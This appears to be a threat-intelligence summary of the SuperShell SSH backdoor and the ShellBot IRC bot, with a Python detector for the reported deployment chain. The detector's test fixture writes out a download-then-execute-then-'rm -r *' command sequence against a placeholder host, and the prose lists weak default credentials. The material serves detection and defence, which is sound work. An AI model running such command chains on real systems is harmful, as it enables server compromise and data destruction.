- SuperShell is a sophisticated backdoor targeting Linux SSH servers. It is written in Go, which gives it cross-platform support on Linux, Windows, and Android. Created by a Chinese-speaking developer, it operates as a reverse shell, letting attackers execute commands remotely on compromised systems. The attack begins with brute-force and dictionary attacks against SSH servers using weak credentials such as "root/password" and "root/123456qwerty". Once access is gained, the attackers run a series of commands to download and install SuperShell, using tools like wget, curl, tftp, and FTP, with download sources often hosted on compromised servers.
- SuperShell's obfuscation adds complexity, but it can still be identified through specific internal strings and its runtime behavior. The installation process is versatile, targeting directories like /tmp, /var/run, /mnt, and /root, and the commands often include clean-up steps to remove traces after installation (rm -r *). Typically, the payload is a script or binary that is downloaded, made executable with chmod +x, and then run (./ssh1). This pattern is observed consistently across multiple command variants, highlighting the redundancy built into the deployment to ensure it succeeds.
- Additionally, the attackers often deploy XMRig, a Monero cryptocurrency miner, alongside SuperShell, hinting at a dual-purpose attack: maintaining persistent control over the system while generating illicit cryptocurrency.
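A detection check for the command chain summarized above (download tool, chmod +x, local execution, rm -r * cleanup, all in one SSH session), written here as an added example and not taken from the report; the session lines and the download.invalid host are constructed, and the input is assumed to be one session's shell commands as recorded by auditd or shell history.

```python
import re

# Drop directories and download tools named in the SuperShell write-up above.
DROP_DIRS = ("/tmp", "/var/run", "/mnt", "/root")
STAGE_PATTERNS = {
    "download": re.compile(r"^(?:wget|curl|tftp|ftp)\b"),
    # chmod +x (with optional ugoa prefix) or an octal mode that sets an execute bit
    "chmod_exec": re.compile(r"^chmod\s+(?:[ugoa]*\+x|[0-7]*[1357][0-7]*)\s"),
    "run_local": re.compile(r"^\./\S+"),
    "cleanup": re.compile(r"^rm\s+-r\w*\s+\*"),
}
SPLIT = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")


def split_commands(line):
    """Break one shell line into its simple commands (split on ;, &&, ||, |)."""
    return [c for c in SPLIT.split(line.strip()) if c]


def in_drop_dir(tok):
    """True when a token names, or lies under, one of the reported drop directories."""
    return any(tok == d or tok.startswith(d + "/") for d in DROP_DIRS)


def classify_session(lines):
    """Return the set of deployment stages observed across a session's commands."""
    stages = set()
    for line in lines:
        for cmd in split_commands(line):
            if any(in_drop_dir(tok) for tok in cmd.split()):
                stages.add("drop_dir")
            for name, pat in STAGE_PATTERNS.items():
                if pat.search(cmd):
                    stages.add(name)
    return stages


def is_supershell_like(lines):
    """Flag a session where download, chmod and local execution all occur together."""
    stages = classify_session(lines)
    return {"download", "chmod_exec", "run_local"} <= stages, stages


# Constructed sessions: the first mirrors the reported chain, the second is routine admin work.
SUSPECT = ["cd /tmp",
           "wget http://download.invalid/ssh1 || curl -O http://download.invalid/ssh1",
           "chmod +x ssh1; ./ssh1",
           "rm -r *"]
BENIGN = ["cd /root", "wget https://example.invalid/app.tar.gz", "tar xzf app.tar.gz", "ls -l"]

if __name__ == "__main__":
    for name, session in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, is_supershell_like(session))
```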
2023-03-13 Ahnlab: ShellBot Malware Being Distributed to Linux SSH Servers
- On March 13, 2023, ASEC reported that ShellBot, a Perl-based DDoS bot, is actively targeting Linux SSH servers. The malware exploits weak SSH credentials through brute-force attacks, gaining access to deploy its payload. Once installed, ShellBot connects to a Command and Control (C&C) server via the IRC protocol, enabling attackers to issue commands, steal data, and launch DDoS attacks.
- Initial Access: Attackers scan for servers with open SSH ports (port 22) and use brute-force tools to guess weak or default credentials.
- Installation: After gaining access, ShellBot is deployed, often achieving persistence by modifying startup scripts or cron jobs.
- IRC Protocol: ShellBot uses the IRC protocol for C&C communication, allowing it to receive commands like executing remote tasks or launching DDoS attacks without needing a custom C&C infrastructure.
- Customization: ShellBot is highly customizable, with variants like "LiGhT’s Modded perlbot v2" offering different capabilities and attack methods tailored by various threat actors.